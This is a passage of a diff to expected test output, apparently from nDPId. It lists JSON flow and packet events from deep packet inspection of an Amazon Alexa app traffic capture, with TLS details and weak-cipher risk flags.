-00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3365,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976196942,"flow_last_seen":1490976197363,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1870,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1490976197363,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01284{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3367,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976196942,"flow_last_seen":1490976197363,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4790,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":1490976197363,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 
Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} -00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3377,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976197297,"flow_last_seen":1490976197532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1665,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1490976197532,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01283{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3379,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976197297,"flow_last_seen":1490976197532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4585,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1490976197532,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3351,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196942,"flow_last_seen":1490976196942,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976196942,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3351,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1490976196942,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196942,"pkt":"AMDKkaPvePiC0\/vCCABFAAA85QlAAEAGaDusECrYSBXOebn1AbuZi243AAAAAKAC\/\/8K4AAAAgQFtAQCCAoA9os+AAAAAAEDAwg="} 
+00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3353,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_packet_id":2,"flow_last_seen":1490976197023,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976197023,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwSYFAAOcGXM9IFc55rBAq2AG7ufUB00CKmYtuOHASH\/5wwgAAAgQFtAEDAwY="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3354,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_packet_id":3,"flow_last_seen":1490976197024,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976197024,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo5QpAAEAGaE6sECrYSBXOebn1AbuZi244AdNAi1AQAVe7MwAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3355,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196942,"flow_last_seen":1490976197026,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976197026,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3357,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976197297,"flow_last_seen":1490976197297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976197297,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3357,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1490976197297,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976197297,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8At9AAEAGSmasECrYSBXOebn2AbvarIm+AAAAAKAC\/\/+uEwAAAgQFtAQCCAoA9othAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3361,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_packet_id":2,"flow_last_seen":1490976197355,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976197355,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw5DlAAOcGwhZIFc55rBAq2AG7ufYaDpo72qyJv3ASH\/6iLAAAAgQFtAEDAwY="} 
+00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3362,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_packet_id":3,"flow_last_seen":1490976197356,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976197356,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoAuBAAEAGSnmsECrYSBXOebn2AbvarIm\/Gg6aPFAQAVfsnQAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3363,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976197297,"flow_last_seen":1490976197357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976197357,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3365,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976196942,"flow_last_seen":1490976197363,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1870,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1490976197363,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01284{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3367,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976196942,"flow_last_seen":1490976197363,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4790,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":1490976197363,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} 
+00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3377,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976197297,"flow_last_seen":1490976197532,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1665,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1490976197532,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01283{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3379,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976197297,"flow_last_seen":1490976197532,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4585,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1490976197532,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 
Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041150,"flow_last_seen":1490976041151,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1490976177116,"flow_last_seen":1490976177850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6576,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
-00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1490976177116,"flow_last_seen":1490976187290,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9507,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976195547,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50798,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
-00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976195547,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50798,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1490976177276,"flow_last_seen":1490976187754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12795,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
-00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1490976186164,"flow_last_seen":1490976186790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5152,"flow_avg_l4_payload_len":303,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976134140,"flow_last_seen":1490976135403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13897,"flow_avg_l4_payload_len":463,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 
-00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1490976134141,"flow_last_seen":1490976135403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":31504,"flow_avg_l4_payload_len":533,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1490976134144,"flow_last_seen":1490976135402,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12573,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51987,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 
-00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976134146,"flow_last_seen":1490976135403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14135,"flow_avg_l4_payload_len":504,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1490976134148,"flow_last_seen":1490976135505,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15689,"flow_avg_l4_payload_len":506,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51989,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 
-00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976134149,"flow_last_seen":1490976135403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14785,"flow_avg_l4_payload_len":528,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51990,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":51,"flow_first_seen":1490976139642,"flow_last_seen":1490976140773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":29286,"flow_avg_l4_payload_len":574,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 
-00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1490976139643,"flow_last_seen":1490976140772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12822,"flow_avg_l4_payload_len":493,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976139643,"flow_last_seen":1490976140745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8213,"flow_avg_l4_payload_len":391,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 
-00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1490976139643,"flow_last_seen":1490976140773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":30483,"flow_avg_l4_payload_len":648,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51995,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 